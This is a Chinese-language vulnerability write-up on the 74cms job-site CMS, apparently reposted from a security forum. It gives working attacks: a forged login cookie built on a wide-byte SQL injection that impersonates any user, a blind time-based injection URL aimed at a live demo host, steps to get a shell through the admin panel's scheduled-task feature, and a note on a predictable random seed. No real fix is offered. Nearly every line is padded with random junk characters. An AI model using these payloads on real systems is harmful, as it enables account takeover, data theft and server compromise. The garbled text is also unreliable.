0x1 任意用户登录
4 W) K; }+ M ^4 M1 b( p% B! t. l" ~0 ?6 ^+ K
0x2 盲注* p/ b- f9 |& |. Z8 a9 n- p6 c$ E
7 J& J2 t# d) i, _, a) { 0x3 后台拿shell
& r, W% N1 c' X9 Q7 y. z4 q3 }* b' ~4 w! F
0x4 随机函数问题
9 g& `3 ~* \5 C" Y( b( J; Y7 E( D6 p) Z. l2 _9 H
详细说明:1 @) j! l* p0 d# e: f8 K5 A0 d
+ O$ {& a$ v" z, F; b; G9 y
0x1 任意用户登录
9 i2 Z' \8 [; A! a6 r' Z; J9 ~9 [/ G3 l; e' m7 f7 K
user/login.php
9 {: ~# u, _: e- a Y( W/ Z% q7 I
7 `4 Y5 c& x- x# C5 u4 N elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
7 I% a8 j/ l; X- v0 n. P& S, X$ i* f& ]( l: s, {& i' b1 q6 {3 P
{1 m1 `# ]; j6 z/ e/ b. M- w
" @: P: s" L5 r6 V5 X( u1 ~, D if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))
g' \2 x1 f. u- q6 f; e) |( E3 y$ i0 u6 {$ |7 N: p! J
{
( Y1 F9 r6 q8 \/ ]% m2 w5 N2 Z
* A5 u3 q4 R! {- @9 N/ \' ]* o4 K4 D update_user_info($_COOKIE['QS']['uid'],false,false);' b R/ d& u, F) k- d* X& ]
( P8 H' m0 {) V
header("Location:".get_member_url($_SESSION['utype']));
. ~8 S2 Q1 q% U4 |! G# ]8 l2 K
3 {4 B0 y& V0 o: {( L$ w }7 Z! A' N8 b U$ {% s: x& A/ f1 A
2 M8 _8 |- _0 n- ]6 K
else, B3 k4 o& }5 f
/ |0 @7 v; n% @3 T& |; ^% Z, V {
) i, t+ b* [: P0 n3 k' }0 G# C7 H6 B# M# N- x9 X( V/ G
unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION["openid"]);4 ~* r& h# x+ G, E+ q8 C4 _! q- C
( v4 h9 w J2 J) x) b
setcookie("QS[uid]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);! p' R2 N5 f' l9 _4 a
6 c7 t' U" O" ^- t3 {
setcookie('QS[username]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);
; j3 e/ Z+ O8 U5 [) ?
8 X3 e, t- S& P setcookie('QS[password]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);( D+ P2 b+ s/ ?4 \/ E
/ \7 E8 @2 q* k+ ]! f4 B" m7 X
setcookie("QS[utype]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);! h4 S% C7 W( v( \) s# R
/ k `) v3 u" U# N header("Location:".url_rewrite('QS_login'));/ j0 d: K" v: p2 y8 c/ s/ y
; C2 r! p3 |# ] u% w* W' d
}
! u3 C' L3 K0 a/ l& w
6 K# I* L4 j, s: e& D | }1 k9 C/ e0 f* c9 I& ]1 _) o
9 T- ?$ e8 [1 ]% `- x
include/fun_user.php
2 o' o# {! E* W' M& B9 V/ b# y1 n* _1 R+ B
//检测COOKIE7 M& ^& l z8 J/ I& N/ q6 n! X7 f
$ K W" Q% k( X( M+ l/ s: u
function check_cookie($name,$pwd){" e: u5 a/ ~! n8 y
q0 W" c( C8 J( ^! A7 y, Z
global $db;
2 s ?* W3 M/ e8 C4 j+ s
8 J' h$ d5 }6 t7 |! l $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE username='{$name}' and password = '{$pwd}'");
1 f2 X* ], r, h& o7 |* E& }* f
. Y. D$ P, \7 \1 N if($row['num'] > 0)- p( Q' s+ m* s1 F, M8 @
! W% O9 t' H! ]3 u6 v) p
{
6 b8 N+ W$ l0 h
, V( J5 G$ I$ n; |7 |' \ return true;* o1 Y# P; [( @
% g! X/ P0 w; D' {6 o }else{
. V$ S. s# |0 A/ Y0 W# d, x
1 D0 |9 f2 O J2 M# D5 R/ ^ return false;: ^) ?! Q, R& C
8 E# M. q! c; |, q- c }1 ]6 o& N$ W2 Y" V& G
! H. y; M0 |/ |( F8 M! l
}
- Q% K! r5 Y/ i8 O( U1 ?/ ]% l% L: @" h
构造cookie如下
& M1 o" N a% U' M; {- V2 D4 m, h1 l) k: q/ _1 Z) F
QS[uid] 27 A& m& T+ f' U9 H/ {! J6 p
! V/ D3 T2 \: R$ i5 e! x
QS[utype] 1
( k) G$ R& V* o3 w% v
- B/ Q' ^; _& D QS[password] 111111111111111111111# i; i) }' p/ r
# x9 i/ I* t6 [9 b$ @) J% c
QS[username]%bf%27 or 1=1 %23) H0 @& ^5 b8 A/ b ~/ n0 P J
9 B7 ]' n; h3 O# q4 s0 x uid 为假冒用户的ID utype为用户类型password任意
2 w ?" j: S7 t' q% O' Z5 J! J3 d& n. W; R4 [! G8 w: R3 ?
0x2 盲注/ q& y0 m+ i% N3 Z: J7 c- Q; x6 o& N
% R6 v4 R( t# P+ u% ?7 Q http://demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%238 k# y, f8 ~8 Z. n d
1 F9 D8 ?, y% `3 r- q2 E8 ~; e 上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面1 o u: s4 C7 ?/ S
* q' }+ f C' F) u
0x3 后台拿shell' `( Q. z1 P f+ D5 O
: ? h$ |) q9 V3 p" n; G4 \ 1.先关闭csrf防御功能
* ^' ~0 [% m! S, b0 M; t- r4 ]* J0 g& Q2 C! C0 O( X ]$ b3 j$ s. H
2.在hr工具箱中添加一个伪造的doc,内容为,记下路径data/hrtools/2012/06/1339941553308.doc
. |7 k6 z0 X& I; F
6 Z! a9 P* Q* Y% L7 _1 X4 B 3.在工具-计划任务中添加任务,脚本任务填../../data/hrtools/2012/06/1339941553308.doc
0 G1 V! j9 g' s4 l; Y
( b7 h" ]+ W5 z' r3 ^6 p 4.然后执行
; L. G7 f+ {- ^2 c
2 |! k; T! \/ ]' v3 A/ B 0x4 随机函数问题(几乎可以无视,纯属个人YY)
9 d3 S, n/ t4 D" o0 Z" y8 Z6 Y! H# C8 l# q( W
在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的,只要能猜出就可已不用解双重md5了。
8 x' s4 j$ n6 @
. G' Y" ]) G& J( z% z 这个$QS_pwdhash是由randstr生成5 W: }, I+ P6 E' ^/ U
" J! Y7 a7 O3 ?$ D: q* i9 |- d
function randstr($length=6)
4 x+ `5 v. |4 B3 o! y
. }9 P/ L" P" ]# u8 W: _, t {/ l, R. V# a' \
/ `' y9 N$ c, L4 c$ I8 T3 F$ R5 } $hash='';
% A) v' W2 b; ~2 {" Q: P2 L H) X9 @- O$ n# k; o$ b; x; X7 W# d7 J
$chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';
& t7 R1 u. Z- h8 E
1 b5 q4 A9 S( I8 g6 i6 ?! c; C $max=strlen($chars)-1;$ z, ?3 b4 X9 I* Z- }4 g) n( C
% n8 `" d) }, k. f3 y+ Q- P mt_srand((double)microtime()*1000000);
$ M P7 h/ D- D+ ? q1 @& j" g
2 v7 X' ~! I5 u# U) U for($i=0;$i<$length;$i++) {* o5 ]# M! @7 ~: z
6 [, D8 X, Q, z& u9 O4 Z& O
$hash.=$chars[mt_rand(0,$max)];
( ~! I" f/ F9 x$ b! E
# _5 L! E2 L* ]( ^% h0 w9 i }
& W& i0 z# O! v) F+ l4 C, |' }, A8 w4 I3 c# z+ p0 x5 o7 j
return $hash;
0 y1 m3 U! C+ Z; i0 B8 [
* t: B9 e4 C/ G& l% O }1 {/ M* u5 T/ Z, `
/ L& h1 P/ [" ] D
生成长度为6的随机数,mt_srand()播种一样,就会得到一样的随机数,所以我们最多要猜1000000次就可以了(蛋疼)* C& o/ \* @1 R- q) }3 `( m( {
- o# I, }. w& U* g# g& g9 [) r 漏洞证明:
5 ^# Y6 S5 P" \( z' k5 H' o
Y* r, K" G, _8 K 修复方案:6 {- ~% b3 R( z/ F
1 C4 F& |" t: b$ t2 g
do it yourself~
3 Z- R5 h1 U+ b: j4 T
' D3 P% N; c* E/ q解决一切网站安全,湖盟云防火墙:hnhack.com |
